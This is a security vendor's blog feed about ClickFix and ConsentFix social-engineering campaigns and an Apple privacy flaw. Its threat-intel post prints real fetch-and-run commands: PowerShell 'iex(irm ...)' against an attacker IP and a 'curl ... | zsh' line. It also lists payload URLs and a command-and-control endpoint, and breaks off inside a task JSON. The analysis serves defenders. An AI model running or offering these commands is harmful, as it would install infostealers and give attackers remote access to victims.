<?xml version="1.0"?>		<rss
		version="2.0"
		xmlns:content="http://purl.org/rss/1.0/modules/content/"
		xmlns:wfw="http://wellformedweb.org/CommentAPI/"
		xmlns:dc="http://purl.org/dc/elements/1.1/"
		xmlns:atom="http://www.w3.org/2005/Atom"
		xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
		xmlns:georss="http://www.georss.org/georss"
		xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
		>
			<channel>
				<atom:link href="https://www.malwarebytes.com/blog/feed" rel="self" type="application/rss+xml"/>
				<title>Malwarebytes</title>
				<link>https://www.malwarebytes.com/</link>
				<description><![CDATA[Cyber Security Software &amp; Anti-Malware]]></description>
				<pubDate>Fri, 03 Jul 2026 13:30:36 GMT</pubDate>
				<lastBuildDate>Fri, 03 Jul 2026 13:30:36 GMT</lastBuildDate>
				<sy:updatePeriod>hourly</sy:updatePeriod>
				<sy:updateFrequency>1</sy:updateFrequency>
				<language>en</language>
						<item>
			<title><![CDATA[ Verified X ad spreads Mac malware, while ConsentFix steals Microsoft accounts ]]></title>
			<description><![CDATA[ Two new campaigns show how cybercriminals are increasingly relying on social engineering instead of software exploits to compromise devices and accounts. ]]></description>
								<category>News</category>
										<category><![CDATA[ clickfix ]]></category>
										<category><![CDATA[ ConsentFix ]]></category>
										<category><![CDATA[ verified ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Cybercriminals are finding new ways to trick people into compromising their own devices and accounts. One campaign used a sponsored ad on X to target Mac users, while another technique, dubbed ConsentFix, steals Microsoft 365 accounts without installing malware.</p>



<h2 id="h-verified-x-account-used-in-mac-clickfix-attack" class="wp-block-heading">Verified X account used in Mac ClickFix attack</h2>



<p class="wp-block-paragraph"><a href="https://x.com/JamfThreatLabs/status/2071600199126970563" target="_blank" rel="noreferrer noopener nofollow">Researchers</a> have discovered a <a href="https://www.malwarebytes.com/blog/news/2025/11/new-clickfix-wave-infects-users-with-hidden-malware-in-images-and-fake-windows-updates">ClickFix</a>-style attack running as a sponsored advertisement on X. The ad was posted from a verified account, adding an extra layer of credibility to the scam.</p>



<p class="wp-block-paragraph">ClickFix campaigns use convincing lures—historically fake “human verification” screens, and now a fake download for DynamicLake, a legitimate macOS utility that turns your MacBook’s notch into an unofficial but functional version of Apple&#8217;s <a href="https://support.apple.com/guide/iphone/view-live-activities-in-the-dynamic-island-iph28f50d10d/ios" target="_blank" rel="noreferrer noopener nofollow">Dynamic Island</a>. This type of attack requires the user to paste a command from the clipboard, making it depend heavily on user interaction.</p>



<div class="wp-block-cover aligncenter"><img loading="lazy" width="1133" height="789" class="wp-block-cover__image-background wp-image-432449" alt="Fake ad for DynamicLake" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/advertisement.png?w=1024" data-object-fit="cover" /><span class="wp-block-cover__background has-background-dim"></span><div class="wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow">
<p class="has-text-align-center has-large-font-size wp-block-paragraph"></p>
</div></div>



<p class="has-text-align-center wp-block-paragraph"><em>Image courtesy of Jamf</em></p>



<p class="wp-block-paragraph">In reality, people who clicked the link were redirected to the lookalike domain <code>dynamicmacisland[.]com</code>, where they were instructed to open Terminal and paste installation commands that silently installed malware.</p>



<p class="wp-block-paragraph">The campaign combines three worrying trends: ClickFix-style social engineering using Terminal commands, lookalike domains that mimic trusted Mac apps, and paid advertising infrastructure used to scale attacks to a large audience.</p>



<p class="wp-block-paragraph">The malware reportedly delivers several variants of the <a href="https://www.malwarebytes.com/blog/detections/osx-atomstealer" target="_blank" rel="noreferrer noopener">Atomic Stealer</a> infostealer.  </p>



<p class="wp-block-paragraph">This pattern mirrors previous cases where <a href="https://www.malwarebytes.com/blog/threat-intel/2025/01/clickfix-vs-traditional-download-in-new-darkgate-campaign" target="_blank" rel="noreferrer noopener">Google Ads</a> promoted fake software installers, including malicious sponsored listings that delivered malware when users searched for trusted developer tools. The lesson is clear: paid placement and verification badges are no guarantee of safety, especially when attackers deliberately design campaigns to evade automated screening.</p>



<p class="wp-block-paragraph">The campaign abused X&#8217;s advertising platform, with the malicious ad appearing under a verified account. The researchers reported the advertisement to X and contacted the account owner. The ad appears to have since been removed.</p>



<h2 id="h-consentfix-steals-accounts-instead-of-installing-malware" class="wp-block-heading">ConsentFix steals accounts instead of installing malware</h2>



<p class="wp-block-paragraph">Windows users are also being <a href="https://www.bleepingcomputer.com/news/security/consentfix-and-clickfix-how-microsoft-365-accounts-are-hijacked-in-3-seconds/" target="_blank" rel="noreferrer noopener nofollow">warned</a> about the next generation of ClickFix attacks, called ConsentFix.</p>



<p class="wp-block-paragraph">ConsentFix is different because ,where ClickFix turns you into the installer, ConsentFix turns you into the identity provider. Instead of tricking you into running malware, it uses social engineering to get you to hand over your cloud login tokens through the browser without ever asking you to run malware or type your password.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“It can start with something as mundane as dragging a link into your browser. Three seconds later, a threat actor has the tokens needed to take over your Microsoft 365 account, and you never did anything that traditional security awareness training would flag.”</p>
</blockquote>



<p class="wp-block-paragraph">For example, a phishing email may arrive containing a link, often hosted on trusted platforms such as Dropbox. Sometimes it&#8217;s protected with a password, which also makes it harder for security tools to inspect.</p>



<p class="wp-block-paragraph">If the target clicks on the link, they’ll see what looks like a standard Microsoft sign-in page and be asked to complete the process by dragging a localhost callback link into the browser.</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="866" height="562" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/verification_steps.png" alt="How the ConsentFix trap looks" class="wp-image-432452" /><figcaption class="wp-element-caption"><em>How the ConsentFix trap looks</em></figcaption></figure>



<p class="wp-block-paragraph">That’s when the trap closes. Without realizing it, the victim hands over session tokens to the attacker, giving them access to email and other Microsoft 365 services without needing a password or completing multi-factor authentication (MFA).</p>



<p class="wp-block-paragraph">The method has <a href="https://www.bleepingcomputer.com/news/security/consentfix-and-clickfix-how-microsoft-365-accounts-are-hijacked-in-3-seconds/" target="_blank" rel="noreferrer noopener nofollow">reportedly</a> been shared on a Russian cybercrime forum, making it easy enough for less experienced cybercriminals to steal Microsoft 365 accounts.</p>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">The best protection is knowing these attacks exist and recognizing what they look like. So keep reading our blog. But there&#8217;s more you can do:</p>



<ul class="wp-block-list">
<li>Don&#8217;t trust links that arrive unexpectedly—whether by email, text message, social media, or even through verified accounts or sponsored search results.</li>



<li>Think things through before following instructions that seem unusual or that you don’t fully understand.</li>



<li>When filling out credentials, always check the address in the browser bar. Is that the one you expected? If not, stop.</li>



<li>Use an <a href="https://www.malwarebytes.com/premium" target="_blank" rel="noreferrer noopener">up-to-date, real-time anti-malware solution</a> with web protection.</li>
</ul>



<p class="wp-block-paragraph"><strong>Pro tip:</strong> Did you know the free Malwarebytes <a href="https://www.malwarebytes.com/browserguard">Browser Guard</a> browser extension protects you against malicious websites and ClickFix attacks? It also blocks ads and trackers, so that’s a bonus.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>Stop threats before they can do any harm.</strong></p>



<p class="wp-block-paragraph">Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. <a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Add it to your browser →</a></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/07/verified-x-ad-spreads-mac-malware-while-consentfix-steals-microsoft-accounts</link>
			<pubDate>Fri, 03 Jul 2026 13:30:36 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/07/verified-x-ad-spreads-mac-malware-while-consentfix-steals-microsoft-accounts</guid>
		</item>
				<item>
			<title><![CDATA[ Apple’s Hide My Email doesn&#8217;t hide it very well ]]></title>
			<description><![CDATA[ A year ago a researcher found a vulnerability in Apple's Hide My Email feature and now he's tired of waiting for a fix. ]]></description>
								<category>Bugs</category>
										<category>News</category>
										<category>Privacy</category>
										<category><![CDATA[ Apple ]]></category>
										<category><![CDATA[ Hide My Email ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph"><a href="https://www.404media.co/apple-hide-my-email-vulnerability-reveals-peoples-real-email-addresses/" target="_blank" rel="noreferrer noopener nofollow">404 Media reports</a> that a researcher has found a vulnerability in Apple’s Hide My Email feature that could allow someone to discover a person’s real email address.</p>



<p class="wp-block-paragraph">That&#8217;s especially concerning because protecting your real email address is  exactly what the feature is designed to do. 404 Media did not publish technical details of the vulnerability to avoid helping attackers exploit it, but said it independently verified that the issue works.</p>



<p class="wp-block-paragraph"><a href="https://support.apple.com/en-us/105078" target="_blank" rel="noreferrer noopener nofollow">Hide My Email</a> generates:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Unique, random email addresses that automatically forward to your personal email inbox. Each address is unique to you. You can read and respond directly to emails sent to these addresses and your personal email address is kept private.”</p>
</blockquote>



<p class="wp-block-paragraph">Instead of giving a website or app your real email address when you sign up, you can give it one of these randomly generated addresses. Messages are forwarded to your normal inbox, but the sender shouldn&#8217;t be able to see your real email address. At least, that’s how it’s supposed to work.</p>



<p class="wp-block-paragraph">Tyler Murphy, co-founder of EasyOptOuts, discovered and reported the issue to Apple in June 2025. More than a year later, he says the vulnerability still hasn&#8217;t been fixed.</p>



<p class="wp-block-paragraph">When Murphy reached out to Apple again in May, he received the following response:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“We are still investigating this issue. To avoid placing our customers at risk, we would appreciate you not disclosing this information until our investigation is complete. We appreciate your assistance in helping us to maintain and improve the security of our products.”</p>
</blockquote>



<p class="wp-block-paragraph">Murphy suggested Apple should stop promoting the feature until it could be fixed.  Apple reportedly told him it expected to address the issue in a security update in the coming weeks. When that failed to happen, Murphy decided to reach out to 404 Media.</p>



<p class="wp-block-paragraph">Instead, we <a href="https://techcrunch.com/2026/06/16/apple-plans-to-change-its-hide-my-email-privacy-feature-that-could-make-it-less-effective/" target="_blank" rel="noreferrer noopener nofollow">learned</a> a few weeks ago that Apple plans to make the Hide My Email less useful for some users.  In <a href="https://developer.apple.com/news/?id=sus6t6ab&amp;7194ef805fa2d04b0f7e8c9521f97343" target="_blank" rel="noreferrer noopener nofollow">a note to developers</a>, the company said it will move anonymously generated email addresses to the @private.icloud.com domain. Effectively, this makes it easier for apps and websites to recognize that an email address was created with Hide My Email and potentially refuse to accept it during the sign-up process.</p>



<h2 id="h-what-you-can-do" class="wp-block-heading">What you can do</h2>



<p class="wp-block-paragraph">Using a different email address for every website or service is still good privacy practice. It makes it easier to identify which company exposed your address in a <a href="https://www.malwarebytes.com/cybersecurity/basics/data-breach" target="_blank" rel="noreferrer noopener">data breach</a>, and you can simply stop using a compromised alias without changing your main email address.</p>



<p class="wp-block-paragraph">However, until Apple fixes the issue, you shouldn&#8217;t rely on the Hide My Email feature as the only way to keep your real email address private.</p>



<p class="wp-block-paragraph">Meanwhile, keep an eye open for Apple&#8217;s promised security update.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>Browse like&nbsp;no one&#8217;s&nbsp;watching.</strong>&nbsp;</p>



<p class="wp-block-paragraph">Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read&nbsp;doesn&#8217;t&nbsp;have to feel personal.&nbsp;<a href="https://www.malwarebytes.com/vpn" target="_blank" rel="noreferrer noopener">Try it free →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/07/apples-hide-my-email-doesnt-hide-it-very-well</link>
			<pubDate>Thu, 02 Jul 2026 16:22:25 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/07/apples-hide-my-email-doesnt-hide-it-very-well</guid>
		</item>
				<item>
			<title><![CDATA[ Fake Google and Cloudflare verification pages spread multiple malware families ]]></title>
			<description><![CDATA[ We uncovered ClickFix attacks using fake Google and Cloudflare pages to deliver everything from infostealers to a newly discovered malware loader. ]]></description>
								<category>Scams</category>
										<category>Threat Intel</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">ClickFix attacks, which <a href="https://www.malwarebytes.com/blog/news/2025/11/new-clickfix-wave-infects-users-with-hidden-malware-in-images-and-fake-windows-updates" target="_blank" rel="noreferrer noopener">trick people into running malicious commands themselves</a>, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.</p>



<p class="wp-block-paragraph">A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.</p>



<p class="wp-block-paragraph">We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. </p>



<p class="wp-block-paragraph">In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.</p>



<p class="wp-block-paragraph">Before we look at the technical details, here&#8217;s how to avoid becoming the next victim.</p>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:</p>



<ul class="wp-block-list">
<li><strong>Never copy and run commands from a website</strong> unless you&#8217;re following instructions from a trusted source and understand exactly what the command does.</li>



<li><strong>Be wary of verification pages.</strong> Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you&#8217;re human or fix a problem.</li>



<li><strong>Don&#8217;t let urgency rush you.</strong> Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.</li>



<li><strong>Keep your security software up to date.</strong> Real-time protection and web protection can help block malicious websites before you reach them.</li>



<li><strong>Question unexpected technical instructions.</strong> If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company&#8217;s official support channels.</li>
</ul>



<p class="wp-block-paragraph"><strong>Pro tip:</strong> <a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Malwarebytes Browser Guard</a> can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.</p>



<h2 id="h-technical-analysis" class="wp-block-heading">Technical analysis</h2>



<p class="wp-block-paragraph">The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.</p>



<h3 id="h-different-lures-one-goal" class="wp-block-heading">Different lures, one goal</h3>



<p class="wp-block-paragraph">Most of the campaigns share several characteristics:</p>



<ul class="wp-block-list">
<li>Use of the folder <code>C:\ProgramData\Zooms</code> to extract later stages</li>



<li>PowerShell ClickFix commands that follow similar patterns</li>



<li>Use of Cloudflare R2 buckets to deliver payloads</li>



<li>IP addresses hosted by the ASN Dedik Services Limited</li>



<li>HTML responses containing only the phrase <code>"hehe"</code></li>
</ul>



<p class="wp-block-paragraph">These indicators have changed over time, so they don&#8217;t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.</p>



<p class="wp-block-paragraph">The final command copied by the user usually falls into this pattern:&nbsp;</p>



<pre class="wp-block-code"><code>powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”</code></pre>



<p class="wp-block-paragraph">The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442.&nbsp;</p>



<p class="wp-block-paragraph">To execute these commands, several ClickFix-related templates are used, mainly related to <strong>Google</strong> and <strong>Cloudflare</strong>. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework.&nbsp;</p>



<p class="wp-block-paragraph">We observed these ClickFix campaigns being distributed through:</p>



<ul class="wp-block-list">
<li>Old websites that have likely expired and been repurchased by the actor(s).&nbsp;&nbsp;</li>



<li>CloudFlare Pages (<code>.pages.dev</code><em> </em>domains).&nbsp;</li>



<li>Compromised websites.&nbsp;</li>



<li>Fake services, for example related to QR code or web file access.&nbsp;</li>
</ul>



<h3 id="h-google-clickfix-lures-nbsp" class="wp-block-heading">Google ClickFix lures&nbsp;</h3>



<p class="wp-block-paragraph">The actors behind these campaigns use various Google-related HTML pages and kits.&nbsp;</p>



<p class="wp-block-paragraph">One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.</p>



<p class="wp-block-paragraph">Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example:&nbsp;</p>



<ul class="wp-block-list">
<li><code>/conf/captcha.html?zoneid=10420852</code>&nbsp;</li>



<li><code>/wincapbot/nobot.html&nbsp;</code></li>



<li><code>/xmr/trkuste.php?zone=5327134&nbsp;</code></li>



<li><code>bless.php?zoneid=10327549&amp;clickid=1091581084925173761&amp;cost=0.000000&amp;country=US&amp;device=desktop</code>&nbsp;</li>
</ul>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="442" height="118" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/google_1.png" alt="&quot;Manual Verification Required” ClickFix page" class="wp-image-432045" /></figure>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="456" height="661" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/google_2.png" alt="&quot;Manual Verification Required” ClickFix page" class="wp-image-432047" /><figcaption class="wp-element-caption">&#8220;Manual Verification Required” ClickFix page</figcaption></figure>



<p class="wp-block-paragraph">In this case, the functions related to ClickFix are implemented in the class <code>CustomCaptcha</code>.&nbsp; The command is present in clear without any obfuscation.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" width="789" height="369" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_f12509.png" alt="StartVerification” method in the “CustomCaptcha” class" class="wp-image-432048" /><figcaption class="wp-element-caption">StartVerification” method in the “CustomCaptcha” class</figcaption></figure>



<p class="wp-block-paragraph">Another distribution method uses Cloudflare Pages hosted on <code>.pages.dev</code> subdomains.</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="333" height="450" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_0cb17b.png" alt="&quot;Verify you’re human” ClickFix page" class="wp-image-432049" /><figcaption class="wp-element-caption">&#8220;Verify you’re human” ClickFix page</figcaption></figure>



<p class="wp-block-paragraph">In this case, the HTML page is obfuscated by declaring several variables and XORing them.&nbsp; The deobfuscated code is called <code>SECURITY GATEWAY</code><em> </em>and it’s composed of the functions <code>GatewayRuntime</code><em>, </em><code>RemoteVault</code><em>, </em><code>BeaconDispatcher</code><em>, </em><code>Clipboard</code><em>, </em><code>TokenController</code>, and<em> </em><code>PanelController</code><em>.</em>&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="498" height="477" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_f41a00.png" alt="The PowerShell command declared in the “SECURITY GATEWAY” code " class="wp-image-432050" /><figcaption class="wp-element-caption">The PowerShell command declared in the “SECURITY GATEWAY” code</figcaption></figure>



<p class="wp-block-paragraph">We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary.&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="624" height="423" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_0256b2.png" alt="“New sign-in with trusted token” ClickFix page" class="wp-image-432051" /><figcaption class="wp-element-caption">“New sign-in with trusted token” ClickFix page</figcaption></figure>



<p class="wp-block-paragraph">The interesting part of this ClickFix kit is that it features an &#8220;approval gate,&#8221; as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" width="564" height="156" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_31104e.png" alt="Comments about the kit and the “approval gate” " class="wp-image-432052" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" width="423" height="306" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_6d52ea.png" alt="Comments about the kit and the “approval gate” " class="wp-image-432053" /><figcaption class="wp-element-caption">Comments about the kit and the “approval gate”</figcaption></figure>



<p class="wp-block-paragraph">In more recent campaigns, we&#8217;ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues. </p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="613" height="375" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_1aac6c.png" alt="The “fix audio driver” Meet ClickFix lure" class="wp-image-432054" /><figcaption class="wp-element-caption">The “fix audio driver” Google Meet ClickFix lure</figcaption></figure>



<p class="wp-block-paragraph">In the analyzed cases, the endpoint <code>/api/driver-clipboard.php</code> returned the following malicious command:</p>



<pre class="wp-block-code"><code><code>{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '<strong>151.240.151.126</strong>/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} </code></code></pre>



<h3 id="h-other-lures-nbsp" class="wp-block-heading">Other lures&nbsp;</h3>



<p class="wp-block-paragraph">The actors behind this campaign use various kits and lures, mostly related to Google. However, we&#8217;ve detected other lures that copied commands related to the same infrastructure.&nbsp;</p>



<p class="wp-block-paragraph">The attackers behind these campaigns also compromise multiple websites using different templates related to the <strong>CloudFlare ClickFix</strong> lure.&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="465" height="378" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_58348c.png" alt="“Verify you are human” ClickFix pages" class="wp-image-432055" /></figure>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="396" height="339" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_95cfdb.png" alt="“Verify you are human” ClickFix pages" class="wp-image-432057" /><figcaption class="wp-element-caption">“Verify you are human” ClickFix pages</figcaption></figure>



<p class="wp-block-paragraph">We have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="121" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_39551e.png?w=1024" alt="Some of the CloudFlare ClickFix HTML pages " class="wp-image-432058" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" width="765" height="225" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_d5470a.png" alt="Some of the CloudFlare ClickFix HTML pages " class="wp-image-431976" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" width="837" height="159" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_2d8f9b.png" alt="Some of the CloudFlare ClickFix HTML pages " class="wp-image-432124" /><figcaption class="wp-element-caption">Some of the CloudFlare ClickFix HTML pages </figcaption></figure>



<p class="wp-block-paragraph">We also detected some specifically created fake services websites.  For example, a &#8220;My QR Generator&#8221; site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot. </p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="879" height="354" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_48363d.png" alt="“QR Code” ClickFix lure page " class="wp-image-431979" /><figcaption class="wp-element-caption">“QR Code” ClickFix lure page </figcaption></figure>



<p class="wp-block-paragraph">In this case the command is encoded in base-64:&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="828" height="324" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_efaa48.png" alt="Decoded PowerShell command" class="wp-image-432059" /><figcaption class="wp-element-caption">Decoded PowerShell command</figcaption></figure>



<h3 id="h-powershell-downloader-nbsp" class="wp-block-heading">PowerShell downloader&nbsp;</h3>



<p class="wp-block-paragraph">The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name <code>tmp{4 char}.tmp.ps1</code>.&nbsp;</p>



<p class="wp-block-paragraph">We have detected several variations of this script, but recent versions do the following:&nbsp;</p>



<ul class="wp-block-list">
<li>Create the folder <code>C:\ProgramData\Zooms</code>.&nbsp;</li>



<li>Download the next stage from a CloudFlare bucket and save it in <code>C:\ProgramData\Zooms</code>. In some variants of the script, the next stage is downloaded directly from an IP.&nbsp;</li>



<li>Send the information of the compromised machine to <code>http://{IP}/dl-callback</code>. In some variants of the script, this part is not present.&nbsp;</li>
</ul>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="786" height="258" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_97598f.png" alt="Dropped PowerShell script " class="wp-image-432060" /><figcaption class="wp-element-caption">Dropped PowerShell script</figcaption></figure>



<p class="wp-block-paragraph">The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer.&nbsp;</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>File Distributed</strong>&nbsp;</td><td><strong>Malware distributed</strong>&nbsp;</td></tr><tr><td><code>libEGL.zip</code>, <code>Safe-1.zip&nbsp;</code></td><td>Trojanized Electron App, ResiLoader and StealC&nbsp;</td></tr><tr><td><code>Test.msi&nbsp;</code></td><td>Deno Loader and PowerShell Stealer&nbsp;</td></tr><tr><td><code>arworks.zip&nbsp;</code></td><td>Amatera Stealer&nbsp;</td></tr><tr><td><code>water-night.zip&nbsp;</code></td><td>Remus Stealer&nbsp;</td></tr><tr><td><code>Setup.msi</code>, <code>Invintrum_first.msi</code>&nbsp;</td><td>NetSupport&nbsp;</td></tr><tr><td><code>traffic1.msi&nbsp;</code></td><td>CastleLoader&nbsp;</td></tr><tr><td><code>ibrowser.exe</code>&nbsp;</td><td>Rust Stealer&nbsp;</td></tr></tbody></table></figure>



<p class="wp-block-paragraph">We analyzed a new loader called <strong>ResiLoader</strong> that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using <strong>Deno</strong> to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post.&nbsp;</p>



<h3 id="h-trojanized-electron-app-downloads-resiloader" class="wp-block-heading">Trojanized Electron app downloads ResiLoader</h3>



<p class="wp-block-paragraph">In this case, the ZIP was downloaded from:&nbsp;</p>



<ul class="wp-block-list">
<li><code>pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip&nbsp;</code></li>
</ul>



<p class="wp-block-paragraph">After extraction to:&nbsp;</p>



<ul class="wp-block-list">
<li><code>C:\ProgramData\Zooms\libEGL.zip_ext</code></li>
</ul>



<p class="wp-block-paragraph">The zip contains a trojanized version of the open-source messaging app called &#8220;Franz&#8221;:&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="579" height="372" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_a3fd00.png" alt="The trojanized &quot;Franz&quot; app used to download ResiLoader" class="wp-image-431977" /><figcaption class="wp-element-caption">The trojanized &#8220;Franz&#8221; app used to download ResiLoader</figcaption></figure>



<p class="wp-block-paragraph">The malicious code is implemented in the <code>index.js</code> file:&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="900" height="474" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/image_aa01f3.png" alt="The obfuscated code in the backdoored app" class="wp-image-431978" /><figcaption class="wp-element-caption">The obfuscated code in the backdoored app</figcaption></figure>



<p class="wp-block-paragraph">The downloader performs the following operations:&nbsp;</p>



<ul class="wp-block-list">
<li>Decode the strings with the function <code>HC()</code>.&nbsp;</li>



<li>Reads <em><code>readme.txt</code></em>, expects a campaign key of the form <code>AAAA-BBBB</code>, returns it as an array of tokens. In this case the name is <code><em>resiloader-1</em> </code>and for this we call “ResiLoader” the downloaded DLL.&nbsp;</li>



<li>Reads <code>%APPDATA%\setup.txt</code>; if absent, generates a random 8-char string and persists it.&nbsp;&nbsp;</li>



<li>Obtaining persistence using <code>app.setLoginItemSettings</code>.&nbsp;</li>



<li>Sends a POST request to <code><em>https[:]//completstep[.]com/api/</em></code> and elaborate the JSON response
<ul class="wp-block-list">
<li>If <code>task.e</code> is present, it executes <code>eval(task.e)</code>; it allows the attacker to execute arbitrary JavaScript code.&nbsp;</li>



<li>If <code>task.files</code> is present, create <code>%TEMP%\&lt;Date.now()&gt;\</code>, decode and write each file; if any filename ends in <code>.exe</code>, run it via <code>child_process.exec</code>.&nbsp;</li>
</ul>
</li>
</ul>



<p class="wp-block-paragraph">In our case we received a ZIP that performs the DLL hijacking of <code>ssh-add.exe</code>:&nbsp;</p>



<pre class="wp-block-code"><code>{"task":{"name":"JUNE18USY","files":{&nbsp;

&nbsp;&nbsp; "msys-2.0.dll":"&lt;base64&gt;",&nbsp;

&nbsp;&nbsp; "msys-crypto-3.dll":"&lt;base64&gt;",&nbsp;

&nbsp;&nbsp; "msys-gcc_s-seh-1.dll":"&lt;base64&gt;",&nbsp;

